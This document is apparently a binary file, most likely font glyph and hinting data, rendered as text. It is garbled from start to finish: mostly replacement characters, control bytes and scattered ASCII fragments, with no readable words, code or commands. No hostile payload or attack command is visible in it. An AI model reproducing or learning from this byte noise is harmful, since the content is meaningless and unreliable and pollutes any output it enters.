,�+X!!Y-�, Ұ+-�, /�+\X  G#Faj X db8!!Y!Y-�
,  9/ � G�Fa#� �#J�PX#�RX�@8!Y#�PX�@e8!YY-�,�+X=�!! ֊KRX �#I �UX8!!Y!!YY-�,# � /�+\X# XKS!�YX��&I#�# �I�#a8!!!!Y!!!!!Y-�, ڰ+-�, Ұ+-�, /�+\X  G#Faj� G#F#aj` X db8!!Y!!Y-�, � �� �%Jd#�� PX<�Y-�,�@@BBK�cK�c � �UX � �RX#b �#Bb �#BY �@RX� CcB� CcB� c�e!Y!!Y-�,�Cc#�Cc#-��DdU.�/<��2��<��2�/<��2��<��23!%!!D �$��hU��D��q�3�+�
�+�/�ְ2��2��	+��9013533��������.PK>�/�3�
+�2�/�ֱ��+�
�
+��9�
�90173373P�e��e�����F��W�+�333�+�333�
+�$3��$2�
+�$3��	

$2� /�ֱ��+��
+�@	+�+��/��
+�@	+��+��!+�6�>��+
�>��+
��+�+�+��	+��
+��
+�+�+�+��+��+��+��+��+�+��+@	

................�@015!!5!3!33#3####7!#FD�R�R�R�R��D�P�P�P�P��D���\���`��`�����f��f��\r�0�,��*+�'3��*
+�@*)	+�+�3��
+�@	+�-/�ֱ� ����+�
�) ��(
��+�2�$�2�.+�)�9�(�!$9��"9��$$9017332654&'.546753#4&#"#5.r��q�����ν�����~pvuy���δ������{mY�2=̪�����Ɉ�{kax6Bũ�����h����
-;��++�1�+��8$+
+�8�+
+���</�ֱ��+��� +�.�.�4+�(�=+��$9�4.�$+$9�81�99��990154632#"&7326=4&#"%54632#"&7326=4&#"h���������QLIPQJKPc�m�9_���������QLIPRIJQKM���M��JgfKMJiiJ�rC���N��N����KggKNJhhJ@����!,9��+�+�%�	+�7��:/�ֱ"�"+�-�"�4+���+��;+�-�9�4�	%)$9��(9��999�%�9�7�)0$901467.54632>53#'#"$732677>54&#"@��NLë��igmT).�NJ��UP�h��Ŏ�H�>��([;66�9)aNQX�z�\c�R����b�KP�gA�X��Y�f<?�q�1.�D|�5sD_&Y6=^qP)�/�
	+�/�ֱ��+��90153P�e	�����1�d�/�ֱ
�+0157#&�>�&��ʊ&���F	�.]tk�(��
���(tl]-�1d�/�ֱ
�+0165'73#��Ӂ&�?�����i�]
V�nl]��v	�u��]_W� �+�/�ֱ�+��90173%'1(
�
%0�������/�oV��n�Y��`��]N�4�R�/�3��2�
+�@
	+�
+�@	+�/�
ְ2�	�2�	

+�@		+�
	
+�@
	+�
+015!3!!#N����q�]���Y��5�0��;�%�/�
	+�/�ֱ�+��901530FŖ��<����#
�"�/����/�+�	+�+015!#����f�)�+�
�+�
��/�ֱ��+01353��������+�/�+013`���}-��q���
:�+��+���/�ֱ��+��+��990132#"732654&#"q������Ŋ�������+Y+������*�����������3�+�+� �/���/�ֱ�
+�@	+�+015%#����6�P�a&�o�+��+��
+�@	+�/�ֱ��+��
+�@
	+�
+�@	+�+��
999��9��99901&32!!5>54&#"#a�������P݀[i���	��w�_����Xm���d����*��(+��(
+�@	+�+��
+�@	+�
(
+�
��+/�ְ2��2��+�%� ���
+�@	+�,+��"($9��%99�
�"9��99017332654&+532654&#"#'&632#"$d��{}�~����m|ys������mm�m�����zs�������u}��p����Z�/+�r���7R�
X�	+�+�	
+�3��2�/�	ְ2��2�	
+�@	+�	
+�@		+�+��9��901533##%!'7�����D�Po�:���P��2������+��
+�@	+�+��+�
+��� /�ֳ+��+��!+�6�&�.��.ɰ6�?��O+
�������?k�d+�+� � �#9�.�...�@��9��99��999017332654&#"'!!>76#"&���m}��{th�T��0.qJ����yw�����FH��g"-���������7�'m�+��+��$
+���(/�ֱ�2��!+��)+�!�$9��99�$�9��9��9��90132.#">32#"32654&#"�8�K�0*1kH��@�_�����Ī�y���e�%;\"���8?�����6��͘��RDM&�y�+�3�+���
/�+�6�?���+
�.�
������+��	
+�	
 � �#9�9�	..�	....�@��9015!#7M���)�*����������Xf���#/��+��	+�-�'!	
+�'��0/�ֱ� ��$��+��� ��*�*/��1+�*$�	!$9�!�99�'�99�-�9901467.54632#"$732654&#"32654&#"f�~m|���m~������Ř~{��y{�)�jh��gi��{�,*�r���r�*,�{����|��{x��*o��ol��S���'m�
+��+�%�

+���(/�ֱ��+�!2��)+��
99��
$9�
�
9��9��9�%�901432#"&'7326=#"7326754&#"S�����M�?;S��1�Z�ōym� ��l������������BGI喺^I~���f6-�+�
�/�
��/�ְ2��2��	+0135353������l��c��n6	(�/�
��
/�ְ2�	�2�+�	�9015353cFŖ6��<����n��GWw�	5G0��UU/ҕz���������/��/���/�	+015!5!�B��B�������W��	75%75'%5�VUU��XW������=v�n�+�
�+��
+�@	+�/�ֱ��+�
2��2��+�� +��999��
	999��99901&632#>7>54&#"#53=��ڍt6�0fcTqi[��!�b��ɴ��p6V[�p\u~Yjrc`����r�;��3C��	+�3��	+�7�1/�*!+�A/��$/���D/�ֱ'�'�!+�+�E+�6�?�q+
�=�>������=>....�=>....�@�'�(99�!@		$*.15:$9��"99�	*�-9�A7�9��901! #"&'#"&73233267! !267# 3267&67.#"r�t{�	��Ij2�`}��i�K3	=3{��������P:X�>&C�c���apAJ@j,/9}�����S��SLPO��946��nS�~��2�����K+#k*/�r��1?��,�+�3�+�
+���/�
+��
90133#!!#3�*Ɉ��������Pw������ c�+��+� �
+���!/�ֱ�2��+�� ���"+��9��9��9� �9013!2#%!2654&#!5!2654&#!���|e������U��}���?n��������a�%ʆ�Ӛ�z���ylvuv����#^�!+��!
+�@	+�+��
+�@	+�$/�ֱ��+�2��2�%+��!9��990136#4&#"32653#"v7���������ĥ�������V
_�������������Ɔ�^���	0�+�
�+���/�ֱ
�
�+��+013! !'32=4+��Z����������������
���
�z�G�+�	�+��
+���/�ֱ	�2�	
+�@		+�
2�@		+�
+013!!!!!���
��e���)�����w�	@�+�+��
+���
/�ֱ	�2�	
+�@		+�@		+�+013!!!!����h���
��|x���� w�+��+��
+�@	+�
+���!/�ֱ��+�	2��2�
+�@	+�"+��99��9��9��90132#.#"3267!5!# x>���	�����|�"��4������B,	N��������B*K���P�N��?�+�3�+�3�

+�
��/�ֱ�2��+�2��
+0133!3#!�����=��n��P��}���!�+�+�/�ֱ��+0133����PB����G�+��
+�@	+�	+�/�ֱ��+��+��9�	�9017332653#"'&54B��}m����|w����{����kf�� �?�+�	3�+�3�

+���/�ֱ�2�+�
�9��9013333	##�Ř	���^����|��E���o�*�,�+��+�/�ֱ�
+�@	+�+0133!�������R�c�+�33�+�3�/�ֱ���+���
�
/�+��9��
$9�
�9��999013333#'#������(��*��a��P@P�o�������F�+�3�+�3�/�ֱ��+��
+��9��9��	99013373#�����C���b�Pf��q���
:�+��+���/�ֱ��+��+��9901! !"3254#"q?�K��������ͬ��ض��V
b����������`���������
B�+�+��	
+�	��/�ֱ
�2�
�+��+��9013!2#!!2654&#!�-����h������������yy�q�;�!N�+��+���"/�ֱ��+��#+��999��
99��9901! #"3254#"q?�KdZ����8y@����ͬ��ض��V
b��������T�`���������#e�+�3�+�#�
+���$/�ֱ�2��+�2��2�%+��9��9��9��9�#�9013!2#.=4&#!!2654&#!��upxi%�'�t��6���������p�1'���Dl""�F�v����{�f����-x�(+��(
+�@	+�+��
+�@	+�./�ֱ�, ����+�2�%�22�/+��#($9�%�9��%$9017332654&'&$54$32#4&#"#"'&74f�Θ�����������������ڨ����~ld�.7֢������k_09ޤ��vs�"��:�+�+��2�/�ֱ�
+�@	+�
+�@	+�	+015!!#"l�,����������7�+��+�
3�/�ֱ��	+��+�	�901332653#"$�ż���������%�����%���	!�	+�+�3�
/�+�	�9013373#�x!!x�����ssF�P6����+�333�+�
$3�/�ֱ��+�
�+�6����w+
�������=��+
�.��������i�+
�.�������>f��+
����
���......@............�@��	99901373373#'##6��'�
(�������ܰ��H����H����P�B��&�+�3�+�3�/�
+��
99013	3	3	#	B�2�RT�2�������8�.�"B����0�+�+�3�	/�ֱ�
+��9��9013	3#�||�����P�
am�	.�+��+���
/�+��9��90135!5!!a
���.�����w�����5�/��/���/�ִ+�2��+�2�	+01!#3���������~�'��A��+�/�+013#'�`��������>�/��/���/�ְ2�+���/��+�/�	+013#5!!����~����H=��	�+�
/�+013#'#=+�*�����)�FF�]�f��+��+�/�+013!!��e�R���"�+�
+�/�ִ
+�+0173#R毞���j���N#.��+�!+�'�+��
+�@	+�,!
+���//�ֱ$�$� ��
�
/��$�+�*22��0+��!'999��9�!�99��990146;54&#"#'4547632#.'#"&732675#"j���tj_w�pv����
7�f���ZXk��w�0��k_oaDo^b����:l41K&Ni��HTnG�x���+e�+�
+��+��
+�@	+� /�ֱ�2���+�
�!+��9��
99��9��90133>32#"&'326=4&#"��3�e����k�4$&{^����[}%��HL������SQ�5PZƣ��YKa���N#^�!+��!
+�@	+�+��
+�@	+�$/�ֱ��+�2��2�%+��9��
99015432#4&#"32653"a��xu��k����b��|���*�5pl�c�ߢ*��yX�hl4b���m�+�+��+��
+�@	+� /�ֱ��+�2�
�
��/�!+��99��9��9��9015323#'#"73267.#"b��_�4š5�f��ņ�Xx&&yU���@FCS��LN��PH�CO�c���Na�+�
�+��	
+��� /�ֱ
�2�
�+��!+�
�	
$9��99�
�9�	�9015432!3267#"!54&#"c���B��d�7M:�����|zc�,�3���{��92�9L-vt��8�-X�+�+�3��2�
/���/�ְ2��2�
+�@	+�
+�@	+�+�
�
9��	9015354632.#"3##8���"E*3VT��������
�gb���X�d�K�N+v�+�!�+�+�(�
/���,/�ֱ��+�$2�
�
�
�/�-+��99��
$9��9��9�(
�990153273#"&'7326=#"73267.#"d��g�4���N�E25�I��5�`��Ŋ�Yx'&zV���@SN�����+%�%��zDE ��QJ�EQ��M�+�
3�+��
+�@	+�/�ֱ�2��+�
�+��9��90133>32#4&#"��8�c���srR�+��NW��Z���MB���d.�+�+�/�
��/�ְ2��2��	+013353����:��O�����Kr3�+�
/����/�	��/�ְ2�
�2�+01732653#"&53B4AMŬ�3��]�Xc��m��	����A�+�3�+�
+��
+�@	+�
/�ֱ�2�+��9013333	##��~(�����x�����
�d�+�/�ֱ��+0133�����oN#k�+�33�+�+�3��2�$/�ֱ#��#�+���+��%+�#�9��	9��9��	990133>32>32#4&#"#4&#"��5�ll�'3�p���nme}�qjZt:�MUdd\l��y����k�Q���JC����NN�+�
3�+�+���/�ֱ���+�
�+��9��9��90133>32#4&#"��6�h���qtU�':�V_��U��xRG��a��*N
:�+��+���/�ֱ��+��+��99015432#"7326=4&#"a������ő��������7�����5��������`)N]�
+��+�+��/� /�ֱ�2���+�
�!+��9��
99�
�9��9013>32#"&'326=4&#"��5�i����d�5%xW����Ux%�`ڌNR������CC���CK͢��MCb�`�Ne�+��+�+��/� /�ֱ��+�2�
�
��/�!+��99��9��9��90153273##"73267.#"b��c�4��4�[��Ň�Qs''sO���@KH�&=>��HA"=F���N:�+�+�+���/�ֱ��+��9��90133>32'"��.�X(
eNk:�T^�JC��m���N-w�(+��(
+�@	+�+��
+�@	+�./�ֱ�, ����+�2�%��/+�,�"($9��#9��%,$9017332654&'.54632#4&#"#"'&54m��biwc���ഽpk�wbifZ�����wqIiaUEAT+���a]�Gq\A@J,���id�"��j?`�+��+�3��2�
+�@	+�/�ְ2�	�2�	
+�@		+�	
+�@	+�+��9��9015333#3267#"&5"����?4)U+x�������oL>��������:T�
+�+��+�
3�/�ֱ��	+���
�
/�+�	�9�
�9��901332673#'#"&��fli�#ű
3�i���~����UN�ƠW^�.�:	(�	+�+�3�
/�ֱ�+�	�9013373#.���r�:�LL���-�:x�+�3�+�33�/�ֱ��+�
�+�6�>��+
��������....�....�@��99��	999013373373#'#-ij؞���Ɵ�-+Ο:�P����P���������m.�:&�+�3�+�3�/�
+��
99013	33	#.i������i���#�q������g�K�:4�+�3�
/���/�ֱ�+�
�
9��99901333#"&'7&326?��#
�9)��JS?P/:�W�1� m��pDq^�:	.�+��+���
/�+��9��90135!5!!^I��3��q�����?���=T�/�!+�/��	/�!+�/�ְ2��2� +��9��99��9�	�
9901526=467.=4&?jg��(n\UUUU\n(äg�{qΫ�7u#���i�-.�g̈́�$v7��p}���M��+�/�ֱ
�
�+013������B��v=T�/�!+�/��/�!+�/�ְ
2��2� +��9��99��9��
9901>=467.=4&'73"m^Z^^Z^m)¥elle��$���k�+)�m΄�#u7��q{�}pͪ�7���#T�/�	�/���/�ֱ��+�
�+��99�	�999��99��
9990146323265#"&'.#"���X�U:`4Ba���Z�U;b2C_ڈ�EF3.rM��BJ00jK���U:&�+�
��/�ְ2��2��	+01353������.���k��&#p� /�
+�/�
+�$/�ֱ�� +�2��2��+�2��
2�%+� �99� �!99��
$9��990154753#4&#"32653#5&k��Ɲ���k����b��ʒƶ�*�#&��Րc�ߢ*��yXz���$$FW�"~�+��2�+��
+�3��2�+�#/�"ְ2��2�"
+�@	+�"
+�@"	+�@"	+��+�
�$+�"�99��9901534632#4&#"!!!!53>5'F�
����~bct
��c��0
00g���Ѭvr����Z�;��
�g�h��Z�#/y�+�#33�'�-/�
��0/�ֱ$�$�*+��1+�$�	#$9�*�
"$9��$9�'�"$9�-�$9�
�
$901?.5467'7>327'#"&'3254#"h�2596���J�`a�K���4950���M�ee�K�N����p�L�cf�N���7=>8���N�eb�L���>BA=�z���	������t�+�+�3�
+�	3��2�
+�3��2�/�ְ2�
�2�

+�@
	+�2�
+�@	+�2�+�
�9��9013	3!!!!#!5!5!5!�gh�^8������w��7��i��2�����%������V�"�+�/�ְ2��2��	+0133����������
^�|�3E��	+��	
+�@
	+�#/�+��F/�ְ&2�4�(2� ���4�=+���  ��.�./� � �
 ���/�
�G+��299�.@
	#+19:@C$9� �99�+� &(:C$901467.54$32#4&#"#"$?32654&'.7>54&'.'^^WDD�����������`WEF��������������ň�8J!HP��/S$II'[�)2�a����v�w[cc:E��^�(3�b������w[[e??��dg;cE[k?d��[�6�+�3�
�2�+�
��/�ֱ��+��	+0153353��������X����5��	+��+��3+	
+�3�+3
+�@+/	+�$	
+��$
+�@$ 	+�6/�ִ+��+�(�(�.+�!2�0�2�0�+�+�7+�.(�	$3$9�$+�0$901! ! 32#"54632#4&#"32653#"&X�('��a���byW��X������㼠���[[^ff^[Z������;��P���N�<����l	j����w�֞�_W�rxu�Vb���x�� +u�+��/�$�)/�!+�,/�ֱ!�!�'+�22��-+�!�99�'�999��9�$�99�)�99��9990146;54&#"/&632#.'#"&732675#"x���<:CI������
!qMw��:<3m�KS�nx4?D61
b�����2X+0/>zn-0<#nBbvk�
53#53#b'����''�������q�r���q�rw�"0�/��
+�@	+�/�ֱ�
+�@	+�+015!#C�}��U#
�"�/����/�+�	+�+015!#���X����2;��	+��+��13	
+�1�13
+�@1	+�(2�;	
+���</�ִ+��+�2�32�2�,+�72�$�2�(�$�+�+�=+�,2�	$9�$� 9�1�#9�3� $9�;�901! ! 32#"!2#.=4&+3>54&+X�('��a���byW��X������'��B?B;
�	CM��A[Ob��;��P���N�<����l	i���[R�~>^jK8)AQ*6HD���?8I;{L��+��+���/�+015!{�����}�J�+��+�	��/�ִ+��+�+�+��	99��99014632#"&732654&#"��ig��hj��I54GH35I�j��jl��l7HH77KKc��Y�/�
�/�3��2�
+�@
	+�
+�@	+�/�
ְ2�	�2�	

+�@		+�
	
+�@
	+�+015!3!!#5!c}�f�����C����e��c��F��w���Y�/��/��
+�@	+�/�ְ2���+��2�+��
999��9��9901&632!!5>54&#"#w����Yt�i��.E,9:CI��c��tPpi���<K*2>@2p���*��+��
+�@	+�(/��(
+�@	+�/�
��+/�ְ2��2��+�2�%�2�%
+�@	+�,+��9��(99�%�"9��%9�
�"9��9017332654&+532654&#"#'&632#"&p�K?HTII��CAIE8E��~��G>FL���r.9;0>9~94+:0(^wwn7[`Do|t��$�,�+�
+�/�ִ
+�+��99013������
����`�:\�
+�+��+�
3�/�/�ֱ�2��	+���
�
/�+�	�9�
�9�
�9901332673#'#"&'��odby ű	,SHm(�`�~��HF'��l?B!#�1?D�
7�+�+�/�ִ+���/��+�/�+0143!##"?��T����P�pgD"�/�
�
��/�ֱ��+0153��p��w�M�>�+��/�!+�/�ֱ�+��	99��9��	9012654&'73#wHXHW �AV����110&�4RP`r_���,�+��+�/�ֱ�
+�@	+�+015%#_-�(����x�+�
8�+��/���/�ֱ��+��+��990154632#"&7326=4&#"x���������XVSYZTTXu����u����XijWuTkkTn���
7333n���'������'�٘���{�{���{�{���	��+�+� �/�3��
2�
+�@	+� �/���/�ֱ�
+�@	+��+�2��2�+��	99��
$9��	9��
99��999��9015%#%33##5!73'�-��m�9Q��~~��_��
'������rC���#������6���	$��+��+�
 
+�
� 
+�@ $	+� �/���%/�ֱ�
+�@	+��$+�2�#�#�+��2�&+��	99�$�9�#�9��
$9� �
$9��	99��9015%#	&632!!5>54&#"#�-�)�m�9�����Yt�i��.E,9:CI�'������rC���c��tPpi���<K*2>@2���*.9>��7+�9/�43�:�22�:9
+�@:0	+�(/��(
+�@	+�/�
�/��
+�@	+�?/�ְ2��2��+�2�%�2�%
+�@	+�%�7+�;2�6�12�@+��9��(+999�%�".99�7�,-/0:$9�:9�/+99�(�=9��%9�
�"9��,-999017332654&+532654&#"#'&632#"&	%33##5!73'��K?HTII��CAIE8E��~��G>FL�����m�9W��~~��_��
s.9;0>9~94+:0(^wwn7[`Do|t��rC���#������6r�v�;l�+�
�/��
+�@	+�/�ֱ
�
�+�2��2��+�� +�
�999��
999��99901467>5332653#"&53r�u5�0edSpjZ�����G�
�r5V\�p[v~Wjrc`���+��"/�+�3�+�

+��/�/�+�
�90133#!73#!#3�*Ɉ����毞�����Pw������,�+�3�+�
+���/�+��
90133#!!#33�*Ɉ������3������Pw���a
��H,�+�3�+�
+���/�+��90133#!573#'!#3�*Ɉ�����x����`����Pw��A�������T��+�3�+�
+��/��+��� /�ִ+�2��+�+�!+��9��$9��99��9��9��90133#!46323265#"&#"!#3�*Ɉ���_v[8�4)<lwZG�3+:����Pw��\]�^A/ ^�]A.���
h�+�3�+�
+��/�3�	
�2�/�ֱ��+��+��99��$9��
99��90133#!53!#533�*Ɉ���b�v��}���Pw��E��������#q�+�3�+�
+��/�+�!/�+�$/�ִ+��+�+�%+��
$9��
9�!�990133#!!#4632#"&732654&#"3�*Ɉ�������yWUxwVWyg>+*<<*+>��Pw���TrqUVllV+=;-->>��a�~�+�3�	�+��
+��
+���/�ֱ��	 ���/�	�	
+�@		+�@		+�� ��
3��2�+��9901#!!!!!!!!'p�MN��������1����.���^���v�E��-��+�%+�+��
+�@	+�-/�!+�./�ֱ��!+�*�*�+�	2��2�/+�!�$%-$9�*�&'99��$'*999�%�$90132#4&#"32653#"2654&'73#v7��$�����ĥ��������HXHW �AV��V
_���������������^�i110&�4RP`r�z"T�+�	�+��
+��/�/�ֱ	�2�	
+�@		+�
2�@		+�+�	�
99013!!!!!73#���
��e��毞���)�������zG�+�	�+��
+���/�ֱ	�2�	
+�@		+�
2�@		+�+013!!!!!3���
��e���������)����
���zHQ�+�	�+��
+���/�ֱ	�2�	
+�@		+�
2�@		+�+�	�
99013!!!!!573#'���
��e��x�������)����A�����z
i�+�	�+��
+��/�3�
�2�/�ֱ	�2�	
+�@		+�
2�@		+�	+��	�+��+013!!!!!53353���
��e�������)����E�������",�+�+�/�	/�ֱ�
+��9990173#3"毞�������P�h)�+�+�	/�ֱ�
+��99901333�ƽ������P
����WH)�	+�
+�
/�	ֱ�+�	�99901573#'3�x����-�A��������P��|
@�+�+�/�3�
�	2�/�ֱ��+���+��
+01533535���E�����PE��*	�
]�+��+��
+�3��2�/�ְ2��2�
+�@	+�
+�@	+��+��+0153! )32=4+!!*��Z����A���������~��������
���
���T��+�3�+�3�/��+��� /�ֱ��+�+��+�+��+��!+��	99��99��	99��9��9��9013373#46323265#"&#"�����Cv[8�4)<lwZG�3+:���b�Pf��\]�^A/ ^�]A.q��7
 =�+��+���!/�ֱ��+��"+��$901! !"3254#"73#q?�K��������ͬ��ض��?毞V
b����������`���������q��3
 =�+��+���!/�ֱ��+��"+��$901! !"3254#"3q?�K��������ͬ��ض��*����V
b����������`�������
��q��]
$=�+��+���%/�ֱ��+��&+�� $901! !"3254#"573#'q?�K��������ͬ��ض��R�x����V
b����������`�����������q��i
/z�+��+��)/�"�,")+���0/�ֱ��+�/+�/�%+�&+�&�+��1+�%/�)$9�)�/9�"�901! !"3254#"46323265#"&#"q?�K��������ͬ��ض��)v[8�4)<lwZG�3+:V
b����������`������]�^A/ ^�]A.q��"
#`�+��+��/� 3�
�!2�$/�ֱ��+��� +�#�#�+��%+� �$901! !"3254#"53353q?�K��������ͬ��ض��,��V
b����������`�����������X��y	7			XG��~FG~��H~����_NN~��M~����~L��q���%1e�+�)�+�"��2/�ֱ��,+��3+��9�,�&$9��9�)�99�"�
1999��901!273!"&'#7.7.#"3254&/q?�^�HQ��MU����U�@[��TY�&# 2|H�ͥ,j>��!V
b3.��T������)(��T�U�4�),��u""��K�2����">�+��+�
3�/�/�ֱ��	+��+�	�99901332653#"$73#�ż��������毞��%�����%�4������;�+��+�
3�/�ֱ��	+��+�	�99901332653#"$3�ż�������̹�����%�����%�,
������H;�+��+�
3�/�ֱ��	+��+�	�99901332653#"$573#'�ż��������x������%�����%�Y��������
\�+��+�
3�/�3�
�2�/�ֱ��+���+���	+��+��9901332653#"$53353�ż������������%�����%�]�����
4�+�+�3�/�ֱ�+��	
999��9013	3#3�||���������P�

���a�K�+�+�

+��
+���/�ֱ�
22��+��+�
�90133!2#!!2654&#!��
�����
���������콾��Ӝqr����p'v�+�+��#/���(/�ֱ'�'� +��
 +��/�
��+�
�)+�'�#$9�
�99��9�#�
9990134632#"&'73265454654&#"�뷡ʁ[ѲT�%,+�=lf���fBh�:���v�9R�䋧�)�0_NT�P�L]l����j���� %0��+�+�)�+��
+�@	+�.
+���1/�ֱ&�&� ���/��&�+�,22��2+��9�&�!"99��#$%)$9��9��99��
990146;54&#"#'&632#.'#"&73#32675#"j���tj_w�뺸��
7�f��|毞�ZXk��w�0��k_oaDvĻ���:l41K&Ni�B���VHTnG�xj���� +0��+�+�$�+��
+�@	+�)
+���1/�ֱ!�!� ���/��!�+�'22��2+��9��$,-0$9��./999��99��
990146;54&#"#'&632#.'#"&732675#"3j���tj_w�뺸��
7�f���ZXk��w������0��k_oaDv���:l41K&Ni��HTnG�xU
��j��� )4��+�+�-�+��
+�@	+�2
+���5/�ֱ*�*� ���/��*�+�022��6+��9�*�!"99��#$')-$9��%&999��99��
990146;54&#"#'&632#.'#"&573#'32675#"j���tj_w�뺸��
7�f����x����jZXk��w�0��k_oaDv���:l41K&Ni�g�����-HTnG�xj��� 4?��+�+�8�+��
+�@	+�=
+��./�'�1'.+�$��@/�ֱ5�42�5� ���/��5�!+�!/�5�+�*;222��++�A+�!�'.$9��99�=�999��
99�.�49�'�!90146;54&#"#'&632#.'#"&46323265#"&#"32675#"j���tj_w�뺸��
7�f��fv[8�4)<lwZG�3+:
ZXk��w�0��k_oaDv���:l41K&Ni��]�^A/ ^�]A.�,HTnG�xj���� $/3��+�+�(�+��
+�@	+�-
+��!/�03�"
�12�4/�ֱ%�%� ���/��!%+�$�%�+�+22���3 ��0�0/�3�5+�0$�($9�3�9�-�999��
990146;54&#"#'&632#.'#"&5332675#"53j���tj_w�뺸��
7�f��i�ZXk��w�z�0��k_oaDv���:l41K&Ni�k��)HTnG�x���j���J +7C��+�+�$�+��
+�@	+�)
+��5/�;+�A/�/+�D/�ֱ!�!� ���/��!�,+�8+�8�>+�2+�2�+�'22��E+�>8�$5/$9�)�999��
99�A;�2,990146;54&#"#'&632#.'#"&732675#"4632#"&732654&#"j���tj_w�뺸��
7�f���ZXk��w�+yWUxwVWyg>+*<<*+>0��k_oaDv���:l41K&Ni��HTnG�xTrqUVllV+=;-->>:��|N.9B��,+�&3�2�2�+�3��@2�;,
+�63�;�2�C/�ֱ/�/� ��
�
/��/�5+�2��:2��<+��D+�5�,2999��)99�<�&$9�2,�#9��")999�;�
9990146;54&#"/&632>32!3267#"&'#"&732675#"!54&#":���gbgz��r�2@�e��;��g�NC5����B8ߠ���daL�+�x���x�q�0��UjynN��QMKS���w��73�,NaZOl��J]W9�pz��a�E�N-��+�%+�+��
+�@	+�-/�!+�./�ֱ��!+�*�*�+�	2��2�/+�!�$%-$9�*�&'99��$'*999�%�$9015432#4&#"32653#"2654&'73#a�����k����b������WHXHW �AV��*�5�c�ߢ*��yX��4��110&�4RP`rc����$l�+�
�+�"�	
+���%/�ֱ
�2�
�+��&+�
�99��	
$9��99�
�9�	�9015432!3267#"73#!54&#"c���B��d�7M:����毞��|zc�,�3���{��92�9L-�����t��c����$g�+�
�+��	
+���%/�ֱ
�2�
�+��&+�
�	
 !$$9��"#$9�
�9�	�9015432!3267#"!54&#"3c���B��d�7M:�����|zc������,�3���{��92�9L-vt���
��c���(p�+�
�+�&�!	
+�!��)/�ֱ
� 2�
�"+��*+�
�99�"�	
$9��$9�
�9�	�9015432!3267#"573#'!54&#"c���B��d�7M:�����x����i�|zc�,�3���{��92�9L-�������t��c����#'��+�
�+�!�	
+��/�$3�
�%2�(/�ֱ
�2�
+��
�$+�'�'$+��)+��	99�$�
!$9�'�9�	
�9015432!3267#"53!54&#"53c���B��d�7M:���s�~�|zc�i�,�3���{��92�9L-����t�������^�)�+�+�	/�ֱ�
+��9990173#3G毞�����?:���C�)�+�+�	/�ֱ�
+��99901333�ż����:���
����2�)�	+�
+�
/�	ֱ�+�	�99901573#'34�x����-�������:����W�B�+�+�	3�
�2�+�/�ֱ��+���+��
+0153353Z������:�����H��0� -r�+�$�+/��/��2�./�ֱ!�!�'+��2�/+�'!�$9��9�+$�9��99��
999��99014327.''%.'77#"7326=.#"H�Z�4	UD��M'S,<O�?�M�_h�����Ť���#�v����J<m�B�f�"�B.}fph�����τ�䮔;Q���'��+�
3�+�+��!/��$!+���(/�ֱ��' ��+�/�'+�2��+�2�
�+�)+��!999�!�'9��90133>32#4&#"46323265#"&#"��6�h���qtU�'mv[8�4)<lwZG�3+::�V_��U��xRG��]�^A/ ^�]A.a��*�
 F�+��+���!/�ֱ��+��"+��99��$9015432#"73#326=4&#"a�������毞Ց��������7�����5����;������a��*�
 F�+��+���!/�ֱ��+��"+�� $9��99015432#"7326=4&#"3a������ő�������ƹ����7�����5�������
��a��*
$O�+��+�!��%/�ֱ��+��&+��99��$9��99015432#"573#'326=4&#"a��������x��������������7�����5������������a��*
!/��+�%�+�,�/��+���0/�ֱ"�"�! ��+�/�!+�"�(+�� ��+�1+�!�%,$9��!9��9015432#"46323265#"&#"326=4&#"a�������v[8�4)<lwZG�3+:1���������7�����5�]�^A/ ^�]A.�������a��*�
#e�+��+��/� 3�
�!2�$/�ֱ�+���+��#+� � /�#�%+� �$9015432#"53326=4&#"53a�������ۣ�����������7�����5������������G�-�.�/�
�/��/�	
��/�ְ2��
2�
+015!5353G����U���_��3��a�y*�%1h�+�)�+�"��2/�ֱ��,+��3+��9�,�&$9��
	99�)�99�"�099��
9901543273#"&'#7.73.#"326=4&'#a�8g.J�hX^���3\*H�d`g�()LC%���8!��# �7��J�����G�[�0��u�P�/�����a�
+�+��+�
3�/�ֱ��	+���
�
/�+��99�	�$9�
�9��901332673#'#"&73#��fli�#ű
3�i��t毞�~����UN�ƠW^���������a�
+�+��+�
3�/�ֱ��	+���
�
/�+�	�$9�
�9��99��901332673#'#"&3��fli�#ű
3�i��_�����~����UN�ƠW^��
�������j�
+�+��+�
3�/�ֱ��	+���
�
/�+��99�	�$9�
�9��99��901332673#'#"&573#'��fli�#ű
3�i�Ƈ�x�����~����UN�ƠW^����������{�
+�+��+�3�
�2�+�
3�/�ֱ� ����	+��� ���/���
�
/�+��99��901332673#'#"&53353��fli�#ű
3�i��a���~����UN�ƠW^�!�����K��>�+�3�
/���/�ֱ�+��99�
�
9��99901333#"&'7&326?3��#
�9)��JS?P/����:�W�1� m��pDq�
����`3U�
+��+��/�/� /�ֱ�22��+�
�!+��
99�
�9��9013>32#"&'326=4&#"��5�b����d�5%xW����Ux%�`���DH������CC���CK͢��MC�K��u�+�3�
�2�+�3�
/���/�ֱ��+��+��/��+��
999��999�
�
9��99901333#"&'7&326?53353��#
�9)��JS?P/����:�W�1� m��pDq�����h��O�%��+��+��+�
�+�"�
+���&/�ֱ��+��
2�
+�@		+�2�@
	+�'+��99��9��9�
�90132!!!!!!#"3267.#"h5�E�O��
��e�j\�C����©=z:=z<��@0	L	��)����
L	��		��a���N"09�� +�3�&�2�+�
3�-�72�2 
+�2��:/�ֱ#�#�)+��12��3+�
�;+�)#� 99��99�3�
$9�
�99�& �9��99�-2�9015432>32!3267#"&'#"7326=4&#"%!54&#"a߂�@A�l��B��d�7M:����A@��ő��������|zc��7mban���{��92�9Li``i5������gt���S�+�+�3�	/�
3�

�2�/�	ֱ��+���
+��+��9��9013	3#53353�||��������P�
7�������+�/�3�
+�	/�ִ+�
+��901573#'��x�����������=�O�
/��
+���/�ִ+��	+�
+�+�	�
99�
�9��
90146323265#"&#"�v[8�4)<lwZG�3+:�]�^A/ ^�]A.#
�5!#���#
�5!#���#
�5!#������#�/����/�+015!�>������#�/����/�+015!�8���P�Q%�/�
+�/�ֱ�+��90153P�a<��d���P�Q%�/�
+�/�ֱ�+��90153P<Š�W���P�Q�%�/�
	+�/�ֱ�+��90153P<Š����P��B�/�3�
+�2�/�ֱ��+��
+��9��9��90153353P�a<��a<��d����d���P��B�/�3�
+�2�/�ֱ��+�
�
+��9��9�
�90153353P<�<�W���W���P��B�/�3�
+�2�/�ֱ��+�
�
+��9��9�
�90153353P<Š�<Š�E¸��M�����'�
.�/�
	+�
	+�/�ִ
+�
+�+0154632#"&�p^_qp__p�<XppX<Ymn���E�+�33�
�	22�+�
��/�ֱ��+���+��
